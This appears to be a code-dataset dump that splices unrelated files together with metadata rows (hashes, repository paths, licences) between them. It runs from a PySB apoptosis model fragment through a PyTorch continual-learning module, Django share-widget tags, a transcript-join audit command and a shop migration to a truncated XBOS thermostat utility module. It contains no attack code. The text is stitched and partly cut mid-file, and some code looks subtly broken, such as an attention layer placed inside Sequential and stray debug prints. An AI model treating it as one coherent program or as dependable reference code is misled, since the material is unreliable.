Rule('inhibition_0_SmacC_inhibitor_Xiap_inh_target', SmacC(Xiap=None) + Xiap(SmacC=None, Apop=None, C3A=None) | SmacC(Xiap=1) % Xiap(SmacC=1, Apop=None, C3A=None), inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf, inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr)
Rule('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex', ApafA() + C9() | Apop(C3pro=None, Xiap=None), conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf, conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr)
Rule('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=None, Xiap=None) + C3pro(Apop=None, C8A=None) | Apop(C3pro=1, Xiap=None) % C3pro(Apop=1, C8A=None), catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr)
Rule('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=1, Xiap=None) % C3pro(Apop=1, C8A=None) >> Apop(C3pro=None, Xiap=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc)
Rule('inhibition_0_Xiap_inhibitor_Apop_inh_target', Xiap(SmacC=None, Apop=None, C3A=None) + Apop(C3pro=None, Xiap=None) | Xiap(SmacC=None, Apop=1, C3A=None) % Apop(C3pro=None, Xiap=1), inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf, inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr)
Rule('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, Apop=None, C3A=None) + C3A(Xiap=None, ParpU=None, C6pro=None) | Xiap(SmacC=None, Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None), catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf, catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr)
Rule('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None) >> Xiap(SmacC=None, Apop=None, C3A=None) + C3ub(), catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc)
Rule('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=None, C6pro=None) + ParpU(C3A=None) | C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1), catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf, catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr)
Rule('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + ParpC(), catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc)
Rule('equilibration_0_BidT_equil_a_BidM_equil_b', BidT() | BidM(BaxM=None), equilibration_0_BidT_equil_a_BidM_equil_b_1kf, equilibration_0_BidT_equil_a_BidM_equil_b_1kr)
Rule('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=None) + BaxM(BidM=None, BaxA=None) | BidM(BaxM=1) % BaxM(BidM=1, BaxA=None), catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf, catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr)
Rule('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=1) % BaxM(BidM=1, BaxA=None) >> BidM(BaxM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc)
Rule('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxM(BidM=None, BaxA=None) | BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) % BaxM(BidM=None, BaxA=1), self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf, self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr)
Rule('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) % BaxM(BidM=None, BaxA=1) >> BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc)
Rule('pore_formation_0_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, SmacM=None, CytoCM=None), pore_formation_0_BaxA_pore_2kf, pore_formation_0_BaxA_pore_1kr)
Rule('pore_formation_1_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, SmacM=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None), pore_formation_1_BaxA_pore_2kf, pore_formation_1_BaxA_pore_1kr)
Rule('pore_formation_2_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None), pore_formation_2_BaxA_pore_2kf, pore_formation_2_BaxA_pore_1kr)
Rule('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + SmacM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=5, CytoCM=None) % SmacM(BaxA=5), transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf, transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr)
Rule('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=5, CytoCM=None) % SmacM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + SmacC(Xiap=None), transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc)
Rule('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + CytoCM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=5) % CytoCM(BaxA=5), transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf, transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr)
Rule('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=5) % CytoCM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + CytoCC(), transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc)
Rule('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=None) + C3pro(Apop=None, C8A=None) | C8A(BidU=None, C3pro=1) % C3pro(Apop=None, C8A=1), catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr)
Rule('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=1) % C3pro(Apop=None, C8A=1) >> C8A(BidU=None, C3pro=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc)
Rule('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=None) + C6pro(C3A=None) | C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1), catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf, catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr)
Rule('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + C6A(C8pro=None), catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc)
Rule('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=None) + C8pro(Fadd=None, C6A=None) | C6A(C8pro=1) % C8pro(Fadd=None, C6A=1), catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf, catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr)
Rule('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=1) % C8pro(Fadd=None, C6A=1) >> C6A(C8pro=None) + C8A(BidU=None, C3pro=None), catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc)
Initial(Ligand(Receptor=None), Ligand_0)
Initial(ParpU(C3A=None), ParpU_0)
Initial(C8A(BidU=None, C3pro=None), C8A_0)
Initial(SmacM(BaxA=None), SmacM_0)
Initial(BaxM(BidM=None, BaxA=None), BaxM_0)
Initial(Apop(C3pro=None, Xiap=None), Apop_0)
Initial(Fadd(Receptor=None, C8pro=None), Fadd_0)
Initial(SmacC(Xiap=None), SmacC_0)
Initial(ParpC(), ParpC_0)
Initial(Xiap(SmacC=None, Apop=None, C3A=None), Xiap_0)
Initial(C9(), C9_0)
Initial(C3ub(), C3ub_0)
Initial(C8pro(Fadd=None, C6A=None), C8pro_0)
Initial(C6A(C8pro=None), C6A_0)
Initial(C3pro(Apop=None, C8A=None), C3pro_0)
Initial(CytoCM(BaxA=None), CytoCM_0)
Initial(CytoCC(), CytoCC_0)
Initial(BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), BaxA_0)
Initial(ApafI(), ApafI_0)
Initial(BidU(C8A=None), BidU_0)
Initial(BidT(), BidT_0)
Initial(C3A(Xiap=None, ParpU=None, C6pro=None), C3A_0)
Initial(ApafA(), ApafA_0)
Initial(BidM(BaxM=None), BidM_0)
Initial(Receptor(Ligand=None, Fadd=None), Receptor_0)
Initial(C6pro(C3A=None), C6pro_0)
| 91.349515
| 710
| 0.806515
|
845186054481ceeb5aae3fd8684349ac61f5aa77
| 4,490
|
py
|
Python
|
NeoCL/models/pretrained.py
|
NizarIslah/NeocorticalCL
|
a0f5cbf863329af9ae752b87f15958105d2c354f
|
[
"Apache-2.0"
] | null | null | null |
NeoCL/models/pretrained.py
|
NizarIslah/NeocorticalCL
|
a0f5cbf863329af9ae752b87f15958105d2c354f
|
[
"Apache-2.0"
] | null | null | null |
NeoCL/models/pretrained.py
|
NizarIslah/NeocorticalCL
|
a0f5cbf863329af9ae752b87f15958105d2c354f
|
[
"Apache-2.0"
] | null | null | null |
import torch
from torch import nn
from avalanche.models import IncrementalClassifier
from avalanche.training import ICaRL
from torch.nn import Linear, ReLU, MultiheadAttention, Sequential
import clip
from torchvision import datasets
from collections import defaultdict, deque
import itertools
class SSLIcarl(nn.Module):
def __init__(self, pretrained_net, embedding_size, num_classes):
super(SSLIcarl, self).__init__()
self.feature_extractor = pretrained_net
# self.feature_extractor.freeze()
self.classifier = Linear(embedding_size, num_classes)
def forward(self, x):
x = self.feature_extractor(x) # Already flattened
x = self.classifier(x)
return x
class ImageNetWiki(datasets.CIFAR100):
def __init__(self, root, class_text, transforms=None, text_transforms=None, context_len=77, train=True):
split = 'train' if train else 'val'
super().__init__(root, train)
self.transforms = transforms
self.n_classes = 100
self.class_text = class_text
self.context_len = context_len
self.text_transforms = text_transforms
def __getitem__(self, index):
im, label = super().__getitem__(index)
text = self.class_text[label]['articles'][0][:self.context_len]
text = clip.tokenize(text).squeeze()
if self.text_transforms:
text = self.text_transforms(text)
if self.transforms:
im = self.transforms(im)
        # Broadcast the token ids over the image's spatial size so the text can be
        # stacked with the image tensor along the channel dimension.
        text = text[:, None, None].expand(-1, im.shape[-2], im.shape[-1]).to(im.dtype)
        print(im.shape, text.shape)
        im_text = torch.cat([im, text], 0)
        return im_text, label
class CLIP_Attention(nn.Module):
def __init__(self, pretrained_net, preprocess, num_classes, num_heads, embed_dim=2048, text_len=77):
super(CLIP_Attention, self).__init__()
self.preprocess = preprocess
self.text_len=text_len
self.feature_extractor = pretrained_net
self.classifier = Sequential(
MultiheadAttention(embed_dim, num_heads),
ReLU(),
Linear(embed_dim, num_classes)
)
def forward(self, x):
image, text = x[:, :-self.text_len], x[:, -self.text_len:]
print(image.shape, text.shape)
image = self.preprocess(image)
with torch.no_grad():
img_features = self.feature_extractor.encode_image(image)
            text_features = self.feature_extractor.encode_text(text)
layers = [module for module in self.classifier.modules() if not isinstance(module, nn.Sequential)]
out = layers[0](query=img_features, key=text_features, value=img_features)
for l, module in enumerate(layers[1:]):
out = module(out)
return out
class PretrainedIncrementalClassifier(IncrementalClassifier):
"""
Output layer that incrementally adds units whenever new classes are
encountered.
Typically used in class-incremental benchmarks where the number of
classes grows over time.
"""
def __init__(self, pretrained_model, in_features, initial_out_features=2):
"""
:param in_features: number of input features, should be = to pretrained out size
:param initial_out_features: initial number of classes (can be
dynamically expanded).
"""
super().__init__(in_features)
self.feature_extractor = pretrained_model
self.classifier = Linear(in_features, initial_out_features)
@torch.no_grad()
def adaptation(self, dataset):
""" If `dataset` contains unseen classes the classifier is expanded.
:param dataset: data from the current experience.
:return:
"""
in_features = self.classifier.in_features
old_nclasses = self.classifier.out_features
new_nclasses = max(self.classifier.out_features,
max(dataset.targets) + 1)
if old_nclasses == new_nclasses:
return
old_w, old_b = self.classifier.weight, self.classifier.bias
self.classifier = torch.nn.Linear(in_features, new_nclasses)
self.classifier.weight[:old_nclasses] = old_w
self.classifier.bias[:old_nclasses] = old_b
def forward(self, x, **kwargs):
""" compute the output given the input `x`. This module does not use
the task label.
:param x:
:return:
"""
z = self.feature_extractor(x)
return self.classifier(z)
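# Illustrative sketch (not part of the original file) of how the incremental
# head grows: adaptation() widens the linear classifier whenever the incoming
# experience contains unseen classes. The toy backbone and dataset below are
# assumptions for this example only.
# backbone = nn.Sequential(nn.Flatten(), nn.Linear(32, 16), nn.ReLU())
# clf = PretrainedIncrementalClassifier(backbone, in_features=16, initial_out_features=2)
# class _ToyExperience: targets = [0, 1, 2, 3]  # four classes seen so far
# clf.adaptation(_ToyExperience())
# print(clf.classifier.out_features)  # -> 4, old weights kept in rows 0-1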
| 37.416667
| 108
| 0.659465
|
1d8f3420130ce81dbc9f1aa684e9bd0ab519acae
| 1,191
|
py
|
Python
|
sharer/templatetags/sharer_tags.py
|
taylanpince/django-sharer
|
91e9bf5aa7b723540f7b248fdf7051a21276eb88
|
[
"Apache-2.0"
] | 2
|
2016-05-09T09:06:06.000Z
|
2018-02-26T22:35:09.000Z
|
sharer/templatetags/sharer_tags.py
|
taylanpince/django-sharer
|
91e9bf5aa7b723540f7b248fdf7051a21276eb88
|
[
"Apache-2.0"
] | null | null | null |
sharer/templatetags/sharer_tags.py
|
taylanpince/django-sharer
|
91e9bf5aa7b723540f7b248fdf7051a21276eb88
|
[
"Apache-2.0"
] | null | null | null |
from urlparse import urljoin
from django import template
from django.contrib.sites.models import Site
from django.template.defaultfilters import urlencode
from sharer.forms import EmailShareForm
from sharer.models import SocialNetwork
from sharer.settings import ENABLE_EMAILS
register = template.Library()
@register.inclusion_tag("sharer/includes/widget.html", takes_context=True)
def share(context, title="", url=""):
"""
Renders the share widget
"""
networks = SocialNetwork.objects.all()
if not url:
url = context.get("SHARE_URI", "")
if url.startswith("/"):
site = Site.objects.get_current()
if site:
url = urljoin("http://%s" % site.domain, url)
return {
"networks": networks,
"title": title,
"url": url,
"ENABLE_EMAILS": ENABLE_EMAILS,
"MEDIA_URL": context.get("MEDIA_URL", ""),
"LANGUAGE_CODE": context.get("LANGUAGE_CODE", ""),
}
@register.simple_tag
def share_url(network, title="", url=""):
"""
Builds a network url with given variables
"""
return network.url % {
"url": urlencode(url),
"title": urlencode(title),
}
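# Illustrative template usage (hypothetical template, not part of this module):
# {% load sharer_tags %}
# {% share title="My article" url="/articles/42/" %}
# {% share_url network "My article" "http://example.com/articles/42/" %}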
| 23.82
| 74
| 0.641478
|
586dc23d21369820a578645e0cb5204786dadb0c
| 1,750
|
py
|
Python
|
nuremberg/core/management/commands/audit_joins.py
|
emmalemma/nuremberg
|
10a5f789f5668aa4e7902e1765737c2c764ff2b2
|
[
"MIT"
] | 3
|
2016-06-27T17:31:24.000Z
|
2021-08-10T17:56:49.000Z
|
nuremberg/core/management/commands/audit_joins.py
|
emmalemma/nuremberg
|
10a5f789f5668aa4e7902e1765737c2c764ff2b2
|
[
"MIT"
] | 43
|
2016-06-19T14:54:20.000Z
|
2021-01-22T19:57:38.000Z
|
nuremberg/core/management/commands/audit_joins.py
|
emmalemma/nuremberg
|
10a5f789f5668aa4e7902e1765737c2c764ff2b2
|
[
"MIT"
] | 6
|
2016-05-24T06:06:53.000Z
|
2021-03-12T19:40:42.000Z
|
from django.core.management.base import BaseCommand
from nuremberg.transcripts.models import Transcript
from nuremberg.transcripts.xml import TranscriptPageJoiner
class Command(BaseCommand):
help = 'Joins transcript pages and outputs a log of all joins made.'
def add_arguments(self, parser):
parser.add_argument('transcript', type=int, help='transcript to audit')
parser.add_argument('from_seq', type=int, help='seq range start')
parser.add_argument('to_seq', type=int, help='seq range end')
parser.add_argument('-a', action='store_true', default=False, help='Log allowed paragraph breaks as well as joins.')
def handle(self, *args, **options):
transcript = Transcript.objects.get(id=options['transcript'])
pages = transcript.pages.filter(seq_number__gte=options['from_seq'], seq_number__lte=options['to_seq'])
joiner = TranscriptPageJoiner(pages)
joiner.audit = True
print('Joining {} pages...'.format(pages.count()))
joiner.build_html()
print('Join ignored:')
for row in joiner.joins:
if row.startswith('IGNORED'):
print(row)
print('Join inserted:')
for row in joiner.joins:
if row.startswith('INSERTED'):
print(row)
print('Join rejected:')
for row in joiner.joins:
if row.startswith('REJECTED'):
print(row)
print('Join caught:')
for row in joiner.joins:
if row.startswith('CAUGHT'):
print(row)
if options['a']:
print('Join allowed:')
for row in joiner.joins:
if row.startswith('ALLOWED'):
print(row)
| 35.714286
| 124
| 0.614286
|
a40bf93a7c008dd732e748cb033ed1a039197bc9
| 2,045
|
py
|
Python
|
shop/migrations/0001_initial.py
|
Slohn/myshop
|
4e5034dc3b1561773060319f16628d44910c4a20
|
[
"MIT"
] | 20
|
2021-05-07T19:32:56.000Z
|
2022-02-06T12:12:56.000Z
|
shop/migrations/0001_initial.py
|
Slohn/myshop
|
4e5034dc3b1561773060319f16628d44910c4a20
|
[
"MIT"
] | 9
|
2021-04-08T18:29:18.000Z
|
2022-03-11T23:28:23.000Z
|
shop/migrations/0001_initial.py
|
Slohn/myshop
|
4e5034dc3b1561773060319f16628d44910c4a20
|
[
"MIT"
] | 10
|
2021-02-22T13:50:24.000Z
|
2022-03-15T11:51:27.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-27 07:15
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=200)),
('slug', models.SlugField(max_length=200, unique=True)),
],
options={
'ordering': ('name',),
'verbose_name': 'category',
'verbose_name_plural': 'categories',
},
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=200)),
('slug', models.SlugField(max_length=200)),
('image', models.ImageField(blank=True, upload_to='products/%Y/%m/%d')),
('description', models.TextField(blank=True)),
('price', models.DecimalField(decimal_places=2, max_digits=10)),
('stock', models.PositiveIntegerField()),
('available', models.BooleanField(default=True)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='products', to='shop.Category')),
],
options={
'ordering': ('-created',),
},
),
migrations.AlterIndexTogether(
name='product',
index_together=set([('id', 'slug')]),
),
]
| 37.87037
| 138
| 0.554034
|
7c81cf8310b0c97adc1faf4c7cbd79981254d120
| 24,505
|
py
|
Python
|
DP/Server/utils.py
|
apanagopoulos/XBOS-DR
|
80e186d691bf17c244b1e87ccb5c2356155748e5
|
[
"Apache-2.0"
] | null | null | null |
DP/Server/utils.py
|
apanagopoulos/XBOS-DR
|
80e186d691bf17c244b1e87ccb5c2356155748e5
|
[
"Apache-2.0"
] | 25
|
2018-05-11T19:15:16.000Z
|
2018-08-09T03:11:28.000Z
|
DP/Server/utils.py
|
apanagopoulos/XBOS-DR
|
80e186d691bf17c244b1e87ccb5c2356155748e5
|
[
"Apache-2.0"
] | 3
|
2017-10-23T18:47:15.000Z
|
2018-08-20T16:41:18.000Z
|
# this is the plotter for the MPC graph
import datetime
import os
import string
import numpy as np
import pandas as pd
import plotly.graph_objs as go
import pytz
import yaml
from xbos import get_client
from xbos.devices.thermostat import Thermostat
# be careful of circular import.
# https://stackoverflow.com/questions/11698530/two-python-modules-require-each-others-contents-can-that-work
import ThermalDataManager
try:
import pygraphviz
from networkx.drawing.nx_agraph import graphviz_layout
# print("using package pygraphviz")
except ImportError:
try:
import pydotplus
from networkx.drawing.nx_pydot import graphviz_layout
# print("using package pydotplus")
except ImportError:
print()
print("Both pygraphviz and pydotplus were not found ")
print("see http://networkx.github.io/documentation"
"/latest/reference/drawing.html for info")
print()
raise
'''
Utility constants
'''
NO_ACTION = 0
HEATING_ACTION = 1
COOLING_ACTION = 2
FAN = 3
TWO_STAGE_HEATING_ACTION = 4
TWO_STAGE_COOLING_ACTION = 5
SERVER_DIR_PATH = UTILS_FILE_PATH = os.path.dirname(__file__) # this is true for now
'''
Utility functions
'''
# ============ BUILDING AND ZONE GETTER ========
def choose_building_and_zone():
print "-----------------------------------"
print "Buildings:"
print "-----------------------------------"
root, dirs, files = os.walk(SERVER_DIR_PATH + "/Buildings/").next()
for index, building in enumerate(dirs, start=1):
print index, building
print "-----------------------------------"
index = input("Please choose a building (give a number):") - 1
building = dirs[index]
print "-----------------------------------"
print ""
print "-----------------------------------"
print " " + str(building)
print "-----------------------------------"
print "-----------------------------------"
print "Zones:"
print "-----------------------------------"
root, dirs, files = os.walk("../Buildings/" + str(building) + "/ZoneConfigs").next()
for index, zones in enumerate(files, start=1):
print index, zones[:-4]
print "-----------------------------------"
index = input("Please choose a zone (give a number):") - 1
zone = files[index][:-4]
print "-----------------------------------"
print "-----------------------------------"
print " " + str(building)
print " " + str(zone)
print "-----------------------------------"
return building, zone
# ============ DATE FUNCTIONS ============
def get_utc_now():
"""Gets current time in utc time.
:return Datetime in utctime zone"""
return datetime.datetime.utcnow().replace(tzinfo=pytz.timezone("UTC"))
def in_between(now, start, end):
"""Finds whether now is between start and end. Takes care of cases such as start=11:00pm and end=1:00am
now = 00:01, and hence would return True.
:param now: (datetime.time)
:param start: (datetime.time)
:param end: (datetime.time)
:return (boolean)"""
if start < end:
return start <= now < end
# when end is in the next day.
elif end < start:
return start <= now or now < end
else:
return True
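# Illustrative check of the wrap-around case described above (values assumed):
# >>> in_between(datetime.time(0, 1), datetime.time(23, 0), datetime.time(1, 0))
# True
# >>> in_between(datetime.time(12, 0), datetime.time(23, 0), datetime.time(1, 0))
# False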
def combine_date_time(time, date):
"""Combines the time and date to a combined datetime.
:param time: (str) HH:MM
:param date: (datetime)
:returns datetime with date from date and time from time. But with seconds as 0."""
datetime_time = get_time_datetime(time)
return date.replace(hour=datetime_time.hour, minute=datetime_time.minute, second=0)
def in_between_datetime(now, start, end):
"""Finds whether now is between start and end.
:param now: (datetime)
:param start: (datetime)
:param end: (datetime)
:return (boolean)"""
return start <= now <= end
def get_time_datetime(time_string):
"""Gets datetime from string with format HH:MM.
:param time_string: string of format HH:MM
:returns datetime.time() object with no associated timezone. """
return datetime.datetime.strptime(time_string, "%H:%M").time()
def get_mdal_string_to_datetime(date_string, with_utc=True):
"""Gets datetime from string with format Year-Month-Day Hour:Minute:Second UTC. Note, string should be for utc
time.
:param date_string: string of format Year-Month-Day Hour:Minute:Second UTC.
:param with_utc: boolean indicating whether to localize to UTC time.
:returns datetime.time() object in UTC time or naive time. """
date_datetime = datetime.datetime.strptime(date_string, "%Y-%m-%d %H:%M:%S %Z")
if with_utc:
return date_datetime.replace(tzinfo=pytz.timezone("UTC"))
else:
return date_datetime
def get_mdal_datetime_to_string(date_object):
"""Gets string from datetime object. In UTC Time.
:param date_object
:returns '%Y-%m-%d %H:%M:%S UTC' """
return date_object.strftime('%Y-%m-%d %H:%M:%S') + ' UTC'
# ============ DATA FUNCTIONS ============
def round_increment(data, precision=0.05):
"""Round to nearest increment of precision.
:param data: np.array of floats or single float
:param precision: (float) the increment to round to
:return (np.array or float) of rounded floats."""
# source for rounding: https://stackoverflow.com/questions/2272149/round-to-5-or-other-number-in-python
return precision * np.round(data / float(precision))
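# Illustrative example (values assumed): rounding setpoints to the nearest 0.05 increment.
# >>> round_increment(np.array([71.23, 71.26]), precision=0.05)
# array([71.25, 71.25])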
def is_cooling(action_data):
"""Returns boolen area of actions which were cooling (either two or single stage).
:param action_data: np.array or pd.series"""
return (action_data == COOLING_ACTION) | (action_data == TWO_STAGE_COOLING_ACTION)
def is_heating(action_data):
"""Returns boolen area of actions which were heating (either two or single stage).
:param action_data: np.array or pd.series"""
return (action_data == HEATING_ACTION) | (action_data == TWO_STAGE_HEATING_ACTION)
def choose_client(cfg=None):
if cfg is not None and cfg["Server"]:
client = get_client(agent=cfg["Agent_IP"], entity=cfg["Entity_File"])
else:
client = get_client()
return client
def get_config(building):
config_path = SERVER_DIR_PATH + "/Buildings/" + building + "/" + building + ".yml"
try:
with open(config_path, "r") as f:
cfg = yaml.load(f)
